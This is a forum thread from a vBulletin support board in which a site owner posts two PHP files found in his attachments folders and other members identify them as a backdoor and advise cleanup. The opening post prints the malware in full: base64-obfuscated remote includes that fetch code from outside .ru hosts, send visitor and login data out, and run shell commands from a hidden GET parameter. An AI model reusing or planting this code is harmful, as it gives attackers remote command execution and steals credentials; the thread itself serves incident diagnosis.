Is this a trojan or backdoor in my images/attachments folder?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Lt. Dan
    New Member
    • Oct 2005
    • 21

    Is this a trojan or backdoor in my images/attachments folder?

    During a recent server change, I found these suspicious .php files in my images/attachments folder.

    First file is called 'includes.php' and contains the following code:

    PHP Code:
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

    The second file is called configs.php and contains the following code:

    PHP Code:
    <?php
    error_reporting
    (0);
    if(isset(
    $_POST["l"]) and isset($_POST["p"])){
    if(isset(
    $_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{
    $user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
    }else{
    $user_auth="";}
    if(!isset(
    $_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(
    base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
    {
    if(isset(
    $_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if(
    $_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>

    I've also found this code in two files in each of the subdirectories of all of my photopost image folders as well.

    Can anyone shed some light on this?
    Last edited by Lt. Dan; Fri 3 Feb '06, 1:25am.
  • TheMusicMan
    Senior Member
    • Oct 2002
    • 2140
    • 3.7.x

    #2
    Firstly, I don't see an images/attachments folder... similar I know but images/attach yes, but not the one you mentioned.

    Also, I don't see those files in my images/attach folder.

    This doesn't necessarily mean that you have been hacked, as it may be related to storing the attachments in the database/filesystem, but I'd submit a support ticket for this and ask vB Staff to comment for you.
    John

    Comment

    • Lt. Dan
      New Member
      • Oct 2005
      • 21

      #3
      By default you won't have this folder. I moved my attachments out of the database and into this folder. The guy that found them told me that these files are phoning home to someone and that they open my server up to vulnerabilities. My question is, how did they get there? He says they appear to have been uploaded via http and not ftp... ???

      Comment

      • TheMusicMan
        Senior Member
        • Oct 2002
        • 2140
        • 3.7.x

        #4
        Submit a support ticket and get vB Staff to provide you with the correct information. If I were you, I'd close my board temporarily too.

        I would also rename those files... or move them to a secure area for subsequent investigation. It seems to me now that your board is vulnerable at the moment.
        John

        Comment

        • Lt. Dan
          New Member
          • Oct 2005
          • 21

          #5
          I have another board running on 3.5.3 and I've found that it too already has these php files embedded in all the attachement folders as well.

          Every attachment folder has a messages.php and a configs.php file in them with the same code.

          Comment

          • Marco van Herwaarden
            Senior Member
            • Nov 2004
            • 6999
            • 3.8.x

            #6
            I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

            You might want to check your server logs to see how they came there.

            I also suggest you ask your host for support on cleaning the server after a possible hack.
            Want to take your board beyond the standard vBulletin features?
            Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

            Comment

            • Lt. Dan
              New Member
              • Oct 2005
              • 21

              #7
              Originally posted by MarcoH64
              I didn't really analyze the scripts you posted, but it looks like someone gained access to your server and placed some unknown scripts there.

              You might want to check your server logs to see how they came there.

              I also suggest you ask your host for support on cleaning the server after a possible hack.
              Its very odd that these same files appeared in a new directory on a different forum in the same locations.

              The guy that analyzed them for me send they were uploaded via http and not ftp, which he thought was odd.

              I also found a .htaccess file in each of the attachment directorys which appear to reference the suspect .php files.
              Last edited by Lt. Dan; Wed 15 Feb '06, 5:19am.

              Comment

              • RedWingFan
                Senior Member
                • Sep 2004
                • 371
                • 4.0.0

                #8
                What permissions do you have on these folders? I have avatars and attachments stored in the filesystem, and when I did the conversion, vB set up the directories for me. I went in now and noticed that permissions are 707 for both of these directories, meaning they are writeable. Had I known, I may have opted to keep these in the database.

                Didn't find these files mentioned above, but IMHO, it's only a matter of time before someone attempts it. I wish the conversion function in vB had warned me about this beforehand. (Or maybe it did, and I don't remember...?)

                The only cure I can think of is a cron job that would delete any files with the .php extension, since these contain only images. Or even setup my own PHP script to run via cron that would clear out anything that is not an image file. Not the best idea, but it might work for now...

                Originally posted by Lt. Dan
                I also found a .htaccess file in each of the attachment directorys which appear to reference the suspect .php files.
                Could you post the contents of that here (removing anything sensitive, of course)?
                Last edited by RedWingFan; Wed 15 Feb '06, 6:32am.

                Comment

                • sensimilla
                  Senior Member
                  • Sep 2004
                  • 264
                  • 3.8.x

                  #9
                  it looks like a backdoor shell uploaded by a script kid to your forum directories
                  delete those files at once, change all dbs passwords, change all users passwords
                  ask your hoster to change your FTP access pass
                  and I would recommand deleting all files from server and replacing them with new ones downloaded form vbulletin.com

                  btw.. this part

                  PHP Code:
                  ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                  after decoding gives

                  you are pwned
                  Last edited by sensimilla; Wed 15 Feb '06, 6:39am.
                  StylWolny.pl - Polskie Forum Dyskusyjne | guziki wieszaki producent - Bonetti.pl
                  Join Tattoo Group Now

                  Comment

                  • Lt. Dan
                    New Member
                    • Oct 2005
                    • 21

                    #10
                    Originally posted by sensimilla
                    it looks like a backdoor shell uploaded by a script kid to your forum directories
                    delete those files at once, change all dbs passwords, change all users passwords
                    ask your hoster to change your FTP access pass
                    and I would recommand deleting all files from server and replacing them with new ones downloaded form vbulletin.com

                    btw.. this part

                    PHP Code:
                    ("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"
                    after decoding gives


                    you are pwned
                    That's what I was thinking myself. Nothing has happened on my server, so I'm guessing this was something automated. These files only show up in my VBB images/attachments folders and no place else.

                    I installed a second VBB to my server about a month ago and these files popped up in this one too.

                    The image/attachments folder is the default location that VBB looks to put attachments when you pull them out of the database, so perhaps its a script that looks to exploit those folders. VBB recommended CHMODD 777 when I created that folder, so that directory and all files are 777, which is probably how it was exploited.

                    The guy that found this on my server said that these scripts will allow the hacker to execut any function allowed on my server, but I've never had anything malicious happen on my server.

                    Comment

                    • Marco van Herwaarden
                      Senior Member
                      • Nov 2004
                      • 6999
                      • 3.8.x

                      #11
                      You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDOS attack.
                      Want to take your board beyond the standard vBulletin features?
                      Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

                      Comment

                      • Lt. Dan
                        New Member
                        • Oct 2005
                        • 21

                        #12
                        Originally posted by MarcoH64
                        You don't always need to notice something if you are hacked. It could also be that your server is used for spamming or to do a DDOS attack.
                        Agreed, that is why I'm trying to find out what is going on. I've got the VBB guys looking at this as well. I dug through all of my files and haven't found this any place else.

                        I deleted all the suspicious PHP and .htaccess files and then uploaded my attachments into a directory with a different name to see if these files reappear.

                        The odd thing is that these files were uploaded via http, not ftp. How was this done?

                        Comment

                        • Marco van Herwaarden
                          Senior Member
                          • Nov 2004
                          • 6999
                          • 3.8.x

                          #13
                          Probably by a script somewhere on your server that you have not found yet.
                          Want to take your board beyond the standard vBulletin features?
                          Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

                          Comment

                          • Lt. Dan
                            New Member
                            • Oct 2005
                            • 21

                            #14
                            Originally posted by MarcoH64
                            Probably by a script somewhere on your server that you have not found yet.
                            If that is the case, deleting everything in my public_html directory should get it, right?

                            Comment

                            • Marco van Herwaarden
                              Senior Member
                              • Nov 2004
                              • 6999
                              • 3.8.x

                              #15
                              Only if the hack is done on your account.

                              Is it a dedicated server, or shared hosting?

                              PS The script could be almost anywhere on your server, even embedded in a regular file/script.

                              There are some tools to help finding this kind of things like chrootkit, your host should know more about them. Unfortunatly, unless you can find exactly how the server was compromised and you can find all traces of it, the only secure way to get rid of things like this, i s acomplete new install (OS and everything) with clean files.
                              Want to take your board beyond the standard vBulletin features?
                              Visit the official Member to Member support site for vBulletin Modifications: www.vbulletin.org

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...